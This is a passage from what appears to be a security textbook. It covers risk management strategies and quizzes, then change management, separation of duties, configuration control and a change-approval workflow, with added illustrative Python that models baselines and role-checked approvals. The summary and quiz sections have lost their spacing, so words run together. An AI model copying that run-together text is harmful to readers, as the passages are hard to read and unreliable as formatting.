Risks are absolutes—they cannot be removed or eliminated. Actions can be taken to change the effects that a risk poses to a system, but the risk itself doesn't really change, no matter what actions are taken to mitigate that risk. A high risk will always be a high risk. However, actions can be taken to reduce the impact of that risk if it occurs. A limited number of strategies can be used to manage risk. The risk can be avoided, transferred, mitigated, or accepted. Avoiding the risk can be accomplished in many ways. Although threats cannot be removed from the environment, one's exposure can be altered. Not deploying a module that increases risk is one manner of risk avoidance.
Another possible action to manage risk is to transfer that risk. A common method of transferring risk is to purchase insurance. Insurance allows risk to be transferred to a third party that manages specific types of risk for multiple parties, thus reducing the individual cost. Another common example of risk transfer is the protection against fraud that consumers have on their credit cards. The risk is transferred to another party, so people can use the card in confidence.
Risk can also be mitigated through the application of controls that reduce the impact of an attack. Controls can alert operators so that the level of exposure is reduced through process intervention. When an action occurs that is outside the accepted risk profile, a second set of rules can be applied, such as calling the customer for verification before committing a transaction. Controls such as these can act to reduce the risk associated with potential high-risk operations.
Accepting risk is always an option; in fact, if risks are not addressed, then this action occurs as a default. Understand that risk cannot be completely eliminated. A risk that remains after implementing controls is termed a residual risk. In this step, you further evaluate residual risks to identify where additional controls are required to reduce risk even more. This leads us to the earlier statement, in the chapter introduction, that the risk management process is iterative.
Risks Associated with Cloud Computing and Virtualization
When examining a complex system such as a cloud or virtual computing environment from a risk perspective, several basic considerations always need to be observed. First, the fact that a system is either in the cloud or virtualized does not change how risk works. Risk is everywhere, and changing a system to a new environment does not change the fact that there are risks. Second, complexity can increase risk exposure. There are specific risks associated with both virtualization and cloud environments. Having data and computing occur in environments that are not under the direct control of the data owner adds both a layer of complexity and a degree of risk. The potential for issues with confidentiality, integrity, and availability increases with the loss of direct control over the environment. The virtualization and cloud layers also present new avenues of attack into a system.
Security is a particular challenge when data and computation are handled by a remote party, as in cloud computing. The specific challenge is how to allow data outside your enterprise and yet remain in control over the use of the data. The common answer is encryption. Through the proper use of encryption of data before it leaves the enterprise, external storage can still be performed securely by properly employing cryptographic elements. The security requirements associated with confidentiality, integrity, and availability remain the responsibility of the data owner, and measures must be taken to ensure that these requirements are met, regardless of the location or usage associated with the data. Another level of protection is through the use of service level agreements (SLAs) with the cloud vendor, although these frequently cannot offer much remedy in the event of data loss.
Chapter20Review
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaboutriskmanagement.
Useriskmanagementtoolsandprinciplestomanageriskeffectively
Riskmanagementisakeymanagementprocessthatmustbeusedateverylevel,whethermanagingaproject,aprogram,oranenterprise.
Riskmanagementisalsoastrategictooltomoreeffectivelymanageincreasinglysophisticated,diverse,andgeographicallyexpansive
businessopportunities.Commonbusinessrisksincludefraudandmanagementoftreasury,revenue,contracts,environment,regulatoryissues,businesscontinuity,andtechnology.
Technologyrisksincludesecurityandprivacy,informationtechnologyoperations,businesssystemscontrolandeffectiveness,informationsystemstesting,andmanagementofbusinesscontinuity,reliabilityandperformance,informationtechnologyassets,projectrisk,andchange.
Exploreriskmitigationstrategies
Manybusinessprocessescanbeusedtomitigatespecificformsofrisk.Thesetoolsincludechangeandincidentmanagement,userrightsandpermissionreviews,routinesystemaudits,andtheuseoftechnologicalcontrolstopreventoralertondataloss.
Describeriskmodels
Ageneralmodelformanagingriskincludesassetidentification,threatassessment,impactdeterminationandquantification,controldesignandevaluation,andresidualriskmanagement.
TheSEImodelformanagingriskincludesthesesteps:identify,analyze,plan,track,andcontrol.
Explainthedifferencesbetweenqualitativeandquantitativeriskassessment
Bothqualitativeandquantitativeriskassessmentapproachesmustbeusedtomanageriskeffectively,andanumberofapproacheswerepresentedinthischapter.
Qualitativeriskassessmentreliesonexpertjudgmentandexperiencebycomparingtheimpactofathreatwiththeprobabilityofitoccurring.
Qualitativeriskassessmentcanbeasimplebinaryassessmentweighing
highorlowimpactagainsthighorlowprobability.Additionallevelscanbeusedtoincreasethecomprehensivenessoftheanalysis.Thewell-knownred-yellow-greenstoplightmechanismisqualitativeinnatureandiseasilyunderstood.
Quantitativeriskassessmentapplieshistoricalinformationandtrendstoassessrisk.Modelsareoftenusedtoprovideinformationtodecision-makers.
Acommonquantitativeapproachcalculatestheannualizedlossexpectancyfromthesinglelossexpectancyandtheannualizedrateofoccurrence(ALE=SLE×ARO).
Itisimportanttounderstandthatitisimpossibletoconductapurelyquantitativeriskassessment,butitispossibletoconductapurelyqualitativeriskassessment.
Useriskmanagementtools
Numeroustoolscanbeusedtoaddcredibilityandrigortotheriskassessmentprocess.
Riskassessmenttoolshelpidentifyrelationships,causes,andeffects.Theyassistinprioritizingdecisionsandfacilitateeffectivemanagementoftheriskmanagementprocess.
Examineriskmanagementbestpractices
Explorebusinesscontinuityconcepts.
Exploretherelationshipsbetweenvulnerabilities,threatvectors,probabilities,andthreatlikelihoodsastheyapplytoriskmanagement.
Understandthedifferencesbetweenriskavoidance,transference,acceptance,mitigation,anddeterrence.
KeyTerms
annualizedlossexpectancy(ALE)(611)annualizedrateofoccurrence(ARO)(611)asset(610)availability(625)control(610)countermeasure(611)exposurefactor(611)hazard(611)impact(610)intangibleimpact(617)meantimebetweenfailures(MTBF)(624)meantimetofailure(MTTF)(625)meantimetorepair(MTTR)(624)mitigate(611)qualitativeriskassessment(611)quantitativeriskassessment(611)residualrisk(618)risk(610)riskanalysis(610)riskassessment(610)riskmanagement(610)safeguard(610)singlelossexpectancy(SLE)(611)systematicrisk(611)tangibleimpact(617)threat(610)threatactor(610)threatvector(610)unsystematicrisk(611)vulnerability(610)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.Assetvalue×exposurefactor=_______________.2.Acontrolmayalsobecalleda(n)______________ora(n)
_______________.
3.Whenathreatexploitsavulnerability,youexperiencea(n)_______________.
4.Singlelossexpectancy×annualizedrateofoccurrence=_______________.
5.Ifyoureducethelikelihoodofathreatoccurring,you_______________arisk.
6.The_______________measuresthemagnitudeofthelossofanasset.
7.Riskanalysisissynonymouswith____________.8.Anycircumstanceoreventwiththepotentialtocauseharmtoan
assetisa(n)_______________.
9.Acharacteristicofanassetthatcanbeexploitedbyathreattocauseharmisits_______________.
10._______________isacircumstancethatincreasesthelikelihoodorprobableseverityofaloss.
Multiple-ChoiceQuiz1.Whichofthefollowingcorrectlydefinesqualitativerisk
management?
A.Theprocessofobjectivelydeterminingtheimpactofanevent
thataffectsaproject,program,orbusiness
B.Theprocessofsubjectivelydeterminingtheimpactofaneventthataffectsaproject,program,orbusiness
C.Thelossthatresultswhenavulnerabilityisexploitedbyathreat
D.Toreducethelikelihoodofathreatoccurring
2.Whichofthefollowingcorrectlydefinesrisk?A.Theriskstillremainingafteraniterationofriskmanagement
B.Thelossthatresultswhenavulnerabilityisexploitedbyathreat
C.Anycircumstanceoreventwiththepotentialtocauseharmtoanasset
D.Thepossibilityofsufferingharmorloss
3.Singlelossexpectancy(SLE)canbestbedefinedbywhichofthefollowingequations?
A.SLE=annualizedlossexpectancy×annualizedrateofoccurrence
B.SLE=assetvalue×exposurefactor
C.SLE=assetvalue×annualizedrateofoccurrence
D.SLE=annualizedlossexpectancy×exposurefactor
4.Whichofthefollowingcorrectlydefinesannualizedrateofoccurrence?
A.Howmuchaneventisexpectedtocostperyear
B.Ameasureofthemagnitudeoflossofanasset
C.Onanannualizedbasis,thefrequencywithwhichaneventis
expectedtooccur
D.Theresourcesorinformationanorganizationneedstoconductitsbusiness
Forquestions5and6,assumethefollowing:Theassetvalueofasmalldistributionwarehouseis$5million,andthiswarehouseservesasabackupfacility.Itscompletedestructionbyadisasterwouldtakeawayabout1/5ofthecapabilityofthebusiness.Alsoassumethatthissortofdisasterisexpectedtooccuraboutonceevery50years.
5.Whichofthefollowingisthecalculatedsinglelossexpectancy(SLE)?
A.SLE=$25million
B.SLE=$1million
C.SLE=$2.5million
D.SLE=$5million
6.Whichofthefollowingisthecalculatedannualizedlossexpectancy(ALE)?
A.ALE=$50,000
B.ALE=$1million
C.ALE=$20,000
D.ALE=$50million
7.Whendiscussingqualitativeriskassessmentversusquantitativeriskassessment,whichofthefollowingistrue?
A.Itisimpossibletoconductapurelyquantitativeriskassessment,anditisimpossibletoconductapurelyqualitativeriskassessment.
B.Itispossibletoconductapurelyquantitativeriskassessment,
butitisimpossibletoconductapurelyqualitativeriskassessment.
C.Itisimpossibletoconductapurelyquantitativeriskassessment,butitispossibletoconductapurelyqualitativeriskassessment.
D.Itispossibletoconductapurelyquantitativeriskassessment,anditispossibletoconductapurelyqualitativeriskassessment.
8.Whichofthefollowingcorrectlydefinesresidualrisk?A.Theriskstillremainingafteraniterationofriskmanagement
B.Thepossibilityofsufferingaloss
C.Theresultofavulnerabilitybeingexploitedbyathreatthatresultsinaloss
D.Characteristicsofanassetthatcanbeexploitedbyathreattocauseharm
9.Whichofthefollowingstatementsaboutriskistrue?A.Amanagercanaccepttherisk,whichwillreducetherisk.
B.Theriskitselfdoesn’treallychange.However,actionscanbetakentoreducetheimpactoftherisk.
C.Amanagercantransfertherisk,whichwillreducetherisk.
D.Amanagercantakestepstoincreasetherisk.
10.Fillintheblanks.AvailabilityiscalculatedusingtheformulaAvailability=A/(B+C)
A=________
B=________
C=________
EssayQuiz1.Youaredraftingane-mailtoyourriskmanagementteammembers
toexplainthedifferencebetweentangibleassetsandintangibleassets.Relatepotentialthreatsandrisktotangibleandintangibleimpacts.Writeashortparagraphthatexplainsthedifferenceandincludetwoexamplesofeach.
2.Youhavebeentaskedtoinitiateariskmanagementprogramforyourcompany.TheCEOhasjustaskedyoutosuccinctlyexplaintherelationshipbetweenimpact,threat,andvulnerability.Thinkquickonyourfeetandgiveasinglesentencethatexplainstherelationship.
3.YourCEOnowsays,“Youmentionedthatrisksalwaysexist.IfItakeenoughmeasures,can’tIeliminatetherisk?”Explainwhyrisksalwaysexist.
4.Youareexplainingyourriskmanagementplantoanewteammemberjustbroughtonaspartofacollegeinternshipprogram.Theinternasks,“Withrespecttoimpact,whatdoesathreatdotoarisk?”Howwouldyouanswer?
5.TheinternmentionedinQuestion4nowasksyoutocompareandcontrastacceptingrisk,transferringrisk,andmitigatingrisk.What’syourresponse?
LabProjects
•LabProject20.1Theassetvalueofadistributioncenter(locatedinthemidwesternUnitedStates)andits
inventoryis$10million.Itisoneoftwoidenticalfacilities(theotherisinthesouthwesternUnitedStates).Itscompletedestructionbyadisasterwouldthustakeawayhalfofthecapabilityofthebusiness.Alsoassumethatthissortofdisasterisexpectedtooccuraboutonceevery100years.Fromthis,calculatetheannualizedlossexpectancy.
•LabProject20.2Youhavejustcompletedaqualitativethreatassessmentofthecomputersecurityofyourorganization,withtheimpactsandprobabilitiesofoccurrencelistedinthetablethatfollows.Properlyplacethethreatsina3-by-3tablesimilartothatinFigure20.5.Whichofthethreatsshouldyoutakeactionon,whichshouldyoumonitor,andwhichonesmaynotneedyourimmediateattention?
Chapter 21 Change Management
It is not the strongest of the species that survive, nor the most intelligent, but the one most responsive to change.
—CHARLES DARWIN
In this chapter, you will learn how to
Use change management as an important enterprise management tool
Institute the key concept of separation of duties
Identify the essential elements of change management
Implement change management
Use the concepts of the Capability Maturity Model Integration
It is well recognized that today's computer systems are extremely complex, and it is obvious that inventory management systems for large international enterprises such as Wal-Mart and Home Depot are probably as complex as an aircraft or skyscraper. Prominent operating systems such as Windows and UNIX are also very complex, as are computer processors on a chip. Many of today's web-based applications are extremely complex as well. For example, today's web-based applications typically consist of Flash content on web sites interacting with remote databases through a variety of services or service-oriented architectures hosted on web servers located anywhere in the world. You wouldn't think of constructing an aircraft, large building, computer chip, or automobile in the informal manner sometimes used to develop and operate computer systems of equal complexity. Computer systems have grown to be so complex and mission-critical that enterprises cannot afford to develop and maintain them in an ad hoc manner.
Change management procedures can add structure and control to the development and management of large software systems as they move from development to implementation and during operation. In this chapter, change management refers to a standard methodology for performing and recording changes during software development and system operation. The methodology defines steps that ensure that system changes are required by the organization and are properly authorized, documented, tested, and approved by management. In many conversations, the term configuration management is considered synonymous with change management and, in a more limited manner, version control or release control. The term change management is often applied to the management of changes in the business environment, typically as a result of business process reengineering or quality enhancement efforts. The term change management as used in this chapter is directly related to managing and controlling software development, maintenance, and system operation. Configuration management is the application of change management principles to configuration of both software and hardware.
Why Change Management?
To manage the system development and maintenance processes effectively, you need discipline and structure to help conserve resources and enhance effectiveness. Change management, like risk management, is often considered expensive, nonproductive, unnecessary, and confusing—an impediment to progress. However, like risk management, change management can be scaled to control and manage the development and maintenance of systems effectively.
Cross Check
Risk Management and Change Management Are Essential Business Processes
Chapter 20 presented risk management as an essential decision-making process. In much the same way, change management is an essential practice for managing a system during its entire life cycle, from development through deployment and operation, until it is taken out of service. What security-specific risk-based questions should be asked during change management reviews?
Change management should be used in all phases of a system's life: development, testing, quality assurance (QA), and production. Short development cycles have not changed the need for an appropriate amount of management control over software development, maintenance, and operation. In fact, short turnaround times make change management more necessary, because once a system goes active in today's services-based environments, it often cannot be taken offline to correct errors—it must stay up and online or business will be lost and brand recognition damaged. In today's volatile stock market, for example, even small indicators of lagging performance can have dramatic impacts on a company's stock value. The following scenarios exemplify the need for appropriate change management policy and for procedures over software, hardware, and data:
The developers can't find the latest version of the production source code. Change management practices support versioning of software changes.
A bug corrected a few months ago mysteriously reappears. Proper change management ensures developers always use the most recently changed source code.
Fielded software was working fine yesterday but does not work properly today. Good change management controls access to previously modified modules so that previously corrected errors aren't reintroduced into the system.
Development team members overwrote each other's changes. Today's change management tools support collaborative development.
A programmer spent several hours changing the wrong version of the software. Change management tools support viable management of previous software versions.
New tax rates stored in a table have been overwritten with last year's tax rates. Change control prevents inadvertent overwriting of critical reference data.
A network administrator inadvertently brings down a server as he incorrectly punched down the wrong wires. Just like a blueprint shows key electrical paths, data center connection paths can be version-controlled.
A newly installed server is hacked soon after installation because it is improperly configured. Network and system administrators use change management to ensure configurations consistently meet security standards.
Try This!
Scope of Change Management
See if you can explain why each of the following should be placed under an appropriate change management process:
Web pages
Service packs
Security patches
Third-party software releases
Test data and test scripts
Parameter files
Scripts, stored procedures, or job control language–type programs
Customized vendor code
Source code of any kind
Applications
Tech Tip
Types of Changes
The ITIL v3 Glossary of Terms, Definitions and Acronyms (https://www.axelos.com/glossaries-of-terms) defines the following types of changes (with examples added in parentheses):
Change "The addition, modification or removal of anything that could have an effect on IT Services." (For example, the modification to a module to implement a new capability.)
Standard Change "A preapproved change that is low risk, relatively common and follows a procedure or work instruction." (For example, each month finance must make a small rounding adjustment to reconcile the General Ledger to account for foreign currency calculations.)
Emergency Change "A change that must be introduced as soon as possible." (For example, to resolve a major incident or implement a security patch. The change management process will normally have a specific procedure for handling emergency changes.)
See https://www.axelos.com/best-practice-solutions/itil.aspx for more information.
Just about anyone with more than a year's experience in software development or system operations can relate to at least one of the preceding scenarios. However, each of these scenarios can be controlled, and impacts mitigated, through proper change management procedures. The Sarbanes-Oxley Act of 2002, officially entitled the Public Company Accounting Reform and Investor Protection Act of 2002, was enacted July 30, 2002, to help ensure management establishes viable governance environments and control structures to ensure accuracy of financial reporting. Section 404 outlines the requirements most applicable to information technology. Change management is an essential part of creating a viable governance and control structure and critical to compliance with the Sarbanes-Oxley Act.
The Key Concept: Separation of Duties
A foundation for change management is the recognition that involving more than one individual in a process can reduce risk. Good business control practices require that duties be assigned to individuals in such a way that no one individual can control all phases of a process or the processing and recording of a transaction. This is called separation of duties (also called segregation of duties). It is an important means by which errors and fraudulent or malicious acts can be discouraged and prevented. Separation of duties can be applied in many organizational scenarios because it establishes a basis for accountability and control. Proper separation of duties can safeguard enterprise assets and protect against risks. These controls should be documented, monitored, and enforced.
A well-understood business example of separation of duties is in the management and payment of vendor invoices. If a person can create a vendor in the finance system, enter invoices for payment, and then authorize a payment check to be written, it is apparent that fraud could be perpetrated because the person could write a check to himself for services never performed. Separating duties by requiring one person to create the vendors and another person to enter invoices and write checks makes it more difficult for someone to defraud an employer.
Information technology (IT) organizations should design, implement, monitor, and enforce appropriate separation of duties for the enterprise's information systems and processes. Today's computer systems are rapidly evolving into an increasingly decentralized and networked computer infrastructure. In the absence of adequate IT controls, such rapid growth may allow exploitation of large amounts of enterprise information in a short time. Further, the knowledge of computer operations held by IT staff is significantly greater than that of an average user, and this knowledge could be abused for malicious purposes. Some of the best practices for ensuring proper separation of duties in an IT organization are as follows:
Separation of duties between development, testing, QA, and production should be documented in written procedures and implemented by software or manual processes.
Program developers' and program testers' activities should be conducted on "test" data only. They should be restricted from accessing "live" production data. This will assist in ensuring an independent and objective testing environment without jeopardizing the confidentiality and integrity of production data.
End users or computer operations personnel should not have direct access to program source code. This control helps lessen the opportunity of exploiting software weaknesses or introducing malicious code (or code that has not been properly tested) into the production environment either intentionally or unintentionally.
Functions of creating, installing, and administrating software programs should be assigned to different individuals. For example, since developers create and enhance programs, they should not be able to install them on the production system. Likewise, database administrators should not be program developers on database systems they administer.
All accesses and privileges to systems, software, or data should be granted based on the principle of least privilege, which gives users no more privileges than are necessary to perform their jobs. Access privileges should be reviewed regularly to ensure that individuals who no longer require access have had their access removed.
Formal change management policy and procedures should be enforced throughout the enterprise. Any changes in hardware and software components (including emergency changes) that are implemented after the system has been placed into production must go through the approved formal change management mechanism.
Tech Tip
Steps to Implement Separation of Duties
1. Identify an indispensable function that is potentially subject to abuse.
2. Divide the function into separate steps, each containing a small part of the power that enables the function to be abused.
3. Assign each step to a different person or organization.
Managers at all levels should review existing and planned processes and systems to ensure proper separation of duties. Smaller business entities may not have the resources to implement all of the preceding practices fully, but other control mechanisms, including hiring qualified personnel, bonding contractors, and using training, monitoring, and evaluation practices, can reduce any organization's exposure to risk. The establishment of such practices can ensure that enterprise assets are properly safeguarded and can also greatly reduce error and the potential for fraudulent or malicious activities.
Change management practices implement and enforce separation of duties by adding structure and management oversight to the software development and system operation processes. Change management techniques can ensure that only correct and authorized changes, as approved by management or other authorities, are allowed to be made, following a defined process.
Tech Tip
Change Management
The ITIL v3 Glossary defines change management as "The process responsible for controlling the lifecycle of all changes. The primary objective of change management is to enable beneficial changes to be made, with minimum disruption to IT services." See https://www.axelos.com/glossaries-of-terms.
Elements of Change Management
Change management has its roots in system engineering, where it is commonly referred to as configuration management. Most of today's software and hardware change management practices derive from long-standing system engineering configuration management practices. Computer hardware and software development have evolved to the point that proper management structure and controls must exist to ensure the products operate as planned. Issues such as the Heartbleed and Shellshock incidents illustrate the need to understand configurations and change.
Change management and configuration management use different terms for their various phases, but they all fit into the four general phases defined under configuration management:
Configuration identification
Configuration control
Configuration status accounting
Configuration auditing
Configuration identification is the process of identifying which assets need to be managed and controlled. These assets could be software modules, test cases or scripts, table or parameter values, servers, major subsystems, or entire systems. The idea is that, depending on the size and complexity of the system, an appropriate set of data and software (or other assets) must be identified and properly managed. These identified assets are called configuration items or computer software configuration items.
Related to configuration identification, and the result of it, is the definition of a baseline. A baseline serves as a foundation for comparison or measurement. It provides the necessary visibility to control change. For example, a software baseline defines the software system as it is built and running at a point in time. As another example, network security best practices clearly state that any large organization should build its servers to a standard build configuration to enhance overall network security. The servers are the configuration items, and the standard build is the server baseline.
Configuration control is the process of controlling changes to items that have been baselined. Configuration control ensures that only approved changes to a baseline are allowed to be implemented. It is easy to understand why a software system, such as a web-based order entry system, should not be changed without proper testing and control—otherwise, the system might stop functioning at a critical time.
Configuration control is a key step that provides valuable insight to managers. If a system is being changed, and configuration control is being observed, managers and others concerned will be better informed. This ensures proper use of assets and avoids unnecessary downtime due to the installation of unapproved changes.
Large enterprise application systems require viable change management systems. For example, SAP has its own change management system called the Transport Management System (TMS). Third-party software such as Phire Architect (www.phire-soft.com) and Stat for PeopleSoft (http://software.dell.com/products/stat-peoplesoft/) provide change management applications for Oracle's PeopleSoft or E-Business Suite.
Configuration status accounting consists of the procedures for tracking and maintaining data relative to each configuration item in the baseline. It is closely related to configuration control. Status accounting involves gathering and maintaining information relative to each configuration item. For example, it documents what changes have been requested; what changes have been made, when, and for what reason; who authorized the change; who performed the change; and what other configuration items or systems were affected by the change.
It is important that you understand that even though all servers may be initially configured to the same baseline, individual applications might require a system-specific configuration to run properly. Change management actually facilitates system-specific configuration in that all exceptions from the standard configuration are documented. All people involved in managing and operating these systems will have documentation to help them quickly understand why a particular system is configured in a unique way.
Returning to our example of servers being baselined, if the operating system of those servers is found to have a security flaw, then the baseline can be consulted to determine which servers are vulnerable to this particular security flaw. Those systems with this weakness can be updated (and only those that need to be updated). Configuration control and configuration status accounting help ensure that systems are more consistently managed and, ultimately in this case, the organization's network security is maintained. It is easy to imagine the state of an organization that has not built all servers to a common baseline and has not properly controlled its systems' configurations. It would be very difficult to know the configuration of individual servers, and security could quickly become weak.
Configuration auditing is the process of verifying that the configuration items are built and maintained according to the requirements, standards, or contractual agreements. It is similar to how audits in the financial world are used to ensure that generally accepted accounting principles and practices are adhered to and that financial statements properly reflect the financial status of the enterprise. Configuration audits ensure that policies and procedures are being followed, that all configuration items (including hardware and software) are being properly maintained, and that existing documentation accurately reflects the status of the systems in operation. Configuration auditing takes on two forms: functional and physical. A functional configuration audit verifies that the configuration item performs as defined by the documentation of the system requirements. A physical configuration audit confirms that all configuration items to be included in a release, install, change, or upgrade are actually included, and that no additional items are included—no more, no less.
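The four phases above, carried through as a small Python model: the servers are the configuration items, the standard build is the baseline, a ledger of change records is the status accounting, and two functions perform the checks the text describes (consulting baseline plus ledger to find exactly which servers still run a flawed version, and a physical configuration audit of a release against its manifest). This is an added example, not code from the book; the hostnames, versions, dates, change records, release manifest and all class and function names are constructed for illustration.

```python
"""Configuration identification, a server baseline, configuration status
accounting and a physical configuration audit as a small model.
Added example, not code from the book; hostnames, versions, dates and
change records are constructed sample data."""
from dataclasses import dataclass, field
from datetime import date
from typing import Dict, List

# Configuration identification: the servers are the configuration items and
# the standard build they were installed from is the baseline.
SERVER_BASELINE: Dict[str, str] = {"os": "7.2", "openssl": "1.0.1f", "bash": "4.3"}
SERVERS: List[str] = ["web01", "web02", "db01", "app01"]


@dataclass(frozen=True)
class ChangeRecord:
    """One status accounting entry: which item changed, what, why, who
    authorized it, who performed it, and when."""
    item: str
    component: str
    old: str
    new: str
    reason: str
    authorized_by: str
    performed_by: str
    when: date


@dataclass
class StatusLedger:
    """Configuration status accounting: every approved change to a baselined item."""
    records: List[ChangeRecord] = field(default_factory=list)

    def record(self, rec: ChangeRecord) -> None:
        # Separation of duties: the person performing a change may not be the
        # one who authorized it.
        if rec.authorized_by == rec.performed_by:
            raise ValueError(f"{rec.item}: {rec.performed_by} cannot approve own change")
        self.records.append(rec)

    def history(self, item: str) -> List[ChangeRecord]:
        return [r for r in self.records if r.item == item]


def current_configuration(ledger: StatusLedger, item: str) -> Dict[str, str]:
    """Baseline plus the item's documented exceptions, applied in order."""
    cfg = dict(SERVER_BASELINE)
    for rec in ledger.history(item):
        if cfg[rec.component] != rec.old:
            raise ValueError(f"{item}: ledger out of sequence for {rec.component}")
        cfg[rec.component] = rec.new
    return cfg


def vulnerable_items(ledger: StatusLedger, component: str, affected: List[str]) -> List[str]:
    """Consult baseline and ledger to list only the servers still running an
    affected version, so only those are touched by the fix."""
    return [s for s in SERVERS if current_configuration(ledger, s)[component] in affected]


def physical_audit(manifest: List[str], installed: List[str]) -> Dict[str, List[str]]:
    """Physical configuration audit: everything in the release manifest is
    present on the target and nothing else was slipped in."""
    expected, actual = set(manifest), set(installed)
    return {"missing": sorted(expected - actual), "extra": sorted(actual - expected)}


def demo_ledger() -> StatusLedger:
    """Constructed change history: one server patched for Heartbleed, one for Shellshock."""
    ledger = StatusLedger()
    ledger.record(ChangeRecord("web01", "openssl", "1.0.1f", "1.0.1g",
                               "SPR-101 OpenSSL security patch", "ops-manager",
                               "sysadmin", date(2014, 4, 8)))
    ledger.record(ChangeRecord("db01", "bash", "4.3", "4.3.25",
                               "SPR-102 bash security patch", "ops-manager",
                               "sysadmin", date(2014, 9, 25)))
    return ledger


if __name__ == "__main__":
    ledger = demo_ledger()
    # Only the servers whose documented configuration is still in the
    # affected range need the update.
    print("still on affected OpenSSL:", vulnerable_items(ledger, "openssl", ["1.0.1f"]))
    print("release audit:", physical_audit(["order.war", "schema.sql"],
                                           ["order.war", "debug.jar"]))
```

The point of `current_configuration` refusing an out-of-sequence record is that a ledger which does not reconstruct the real state of a server is worse than none: the vulnerable-server query would then return the wrong hosts.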
Implementing Change Management
Change management requires some structure and discipline in order to be effective. The change management function is scalable from small to enterprise-level projects. Figure 21.1 illustrates a sample software change management flow appropriate for medium to large projects. It can be adapted to small organizations by having the developer perform work only on her workstation (never on the production system) and having the system administrator serve in the build master function. The build master is usually an independent person responsible for compiling and incorporating changed software into an executable image.
• Figure 21.1 Software change control workflow
Tech Tip
Release Management
The ITIL v3 Glossary defines release management as "The process responsible for planning, scheduling and controlling the movement of releases to test and live environments. The primary objective of release management is to ensure that the integrity of the live environment is protected and that the correct components are released." See https://www.axelos.com/glossaries-of-terms.
Figure 21.1 shows that developers never have access to the production system or data. It also demonstrates proper separation of duties between developers, QA and test personnel, and production. It implies that a distinct separation exists between development, testing and QA, and production environments. This workflow is for changes that have a major impact on production or the customer's business process. For minor changes that have minimal risk or impact on business processes, some of the steps may be omitted. The change management workflow proceeds as follows:
1. The developer checks out source code from the code-control tool archive to the development system.
2. The developer modifies the code and conducts unit testing of the changed modules.
3. The developer checks the modified code into the code-control tool archive.
4. The developer notifies the build master that changes are ready for a new build and testing/QA.
5. The build master creates a build incorporating the modified code and compiles the code.
6. The build master notifies the system administrator that the executable image is ready for testing/QA.
7. The system administrator moves the executables to the test/QA system.
8. QA tests the new executables. If the tests are passed, test/QA notifies the manager. If tests fail, the process starts over.
9. Upon manager approval, the system administrator moves the executable to the production system.
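The nine steps above, together with the separation-of-duties best practices listed earlier in the chapter, amount to a state machine: each step is a transition that only one role may perform, a failed test sends the change back to the start, and no single person may act in two roles on the same change (so the developer can neither build, approve, nor deploy what she wrote). The Python below is an added example of that machine, not code from the book or from any change management product; the role names, state names, SPR identifiers and the people are assumptions made for the illustration.

```python
"""The nine-step change workflow of Figure 21.1 as a state machine that
enforces which role may perform each transition and that no one person
acts in two roles on the same change. Added example, not code from the
book; role names, state names and the SPR identifiers are assumptions."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# (current state, action) -> (role that may perform it, resulting state)
TRANSITIONS: Dict[Tuple[str, str], Tuple[str, str]] = {
    ("in_archive", "checkout"):         ("developer", "checked_out"),        # step 1
    ("checked_out", "unit_test"):       ("developer", "unit_tested"),        # step 2
    ("unit_tested", "checkin"):         ("developer", "checked_in"),         # step 3
    ("checked_in", "request_build"):    ("developer", "build_requested"),    # step 4
    ("build_requested", "build"):       ("build_master", "built"),           # step 5
    ("built", "release_to_test"):       ("build_master", "ready_for_test"),  # step 6
    ("ready_for_test", "deploy_test"):  ("sysadmin", "in_test"),             # step 7
    ("in_test", "qa_pass"):             ("qa", "awaiting_approval"),         # step 8
    ("in_test", "qa_fail"):             ("qa", "in_archive"),                # step 8, start over
    ("awaiting_approval", "approve"):   ("manager", "approved"),             # step 9, approval
    ("approved", "deploy_prod"):        ("sysadmin", "in_production"),       # step 9, move
}


class ChangeControlError(Exception):
    """Raised when a transition is out of sequence, by the wrong role, or
    would let one person hold two roles on the same change."""


@dataclass
class ChangeRequest:
    spr_id: str
    state: str = "in_archive"
    participants: Dict[str, str] = field(default_factory=dict)  # role -> person
    log: List[str] = field(default_factory=list)                # status accounting trail

    def act(self, person: str, role: str, action: str) -> str:
        """Apply one workflow action and return the new state."""
        key = (self.state, action)
        if key not in TRANSITIONS:
            raise ChangeControlError(
                f"{self.spr_id}: '{action}' is not allowed from state '{self.state}'")
        required_role, new_state = TRANSITIONS[key]
        if role != required_role:
            raise ChangeControlError(
                f"{self.spr_id}: '{action}' requires role {required_role}, not {role}")
        # Separation of duties: the developer cannot also be the build master,
        # the approving manager, or the person who deploys to production.
        for held_role, who in self.participants.items():
            if who == person and held_role != role:
                raise ChangeControlError(
                    f"{self.spr_id}: {person} already acted as {held_role}, cannot act as {role}")
        self.participants[role] = person
        self.log.append(f"{person} ({role}) {action}: {self.state} -> {new_state}")
        self.state = new_state
        return new_state


def run_sample_change() -> ChangeRequest:
    """Happy path for one constructed change with five distinct people."""
    cr = ChangeRequest("SPR-101")
    for person, role, action in [
        ("alice", "developer", "checkout"),
        ("alice", "developer", "unit_test"),
        ("alice", "developer", "checkin"),
        ("alice", "developer", "request_build"),
        ("bob", "build_master", "build"),
        ("bob", "build_master", "release_to_test"),
        ("carol", "sysadmin", "deploy_test"),
        ("dave", "qa", "qa_pass"),
        ("erin", "manager", "approve"),
        ("carol", "sysadmin", "deploy_prod"),
    ]:
        cr.act(person, role, action)
    return cr


if __name__ == "__main__":
    cr = run_sample_change()
    print("\n".join(cr.log))
    try:
        ChangeRequest("SPR-102").act("alice", "sysadmin", "deploy_prod")
    except ChangeControlError as e:
        print("rejected:", e)
```

For the small-organization adaptation the text mentions (system administrator doubling as build master), the one-person-one-role check would be relaxed for exactly that pairing; the separations that matter most, developer versus production and approval by a manager who is neither, stay in force.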
Tech Tip
Identifying Separation of Duties
Using Figure 21.1, observe the separation of duties between development, test/QA, and production. The functions of creating, installing, and administrating are assigned to different individuals. Note also appropriate management review and approval. This implementation also ensures that no compiler is necessary on the production system. Indeed, compilers should not be allowed to exist on the production system.
Backout Plan
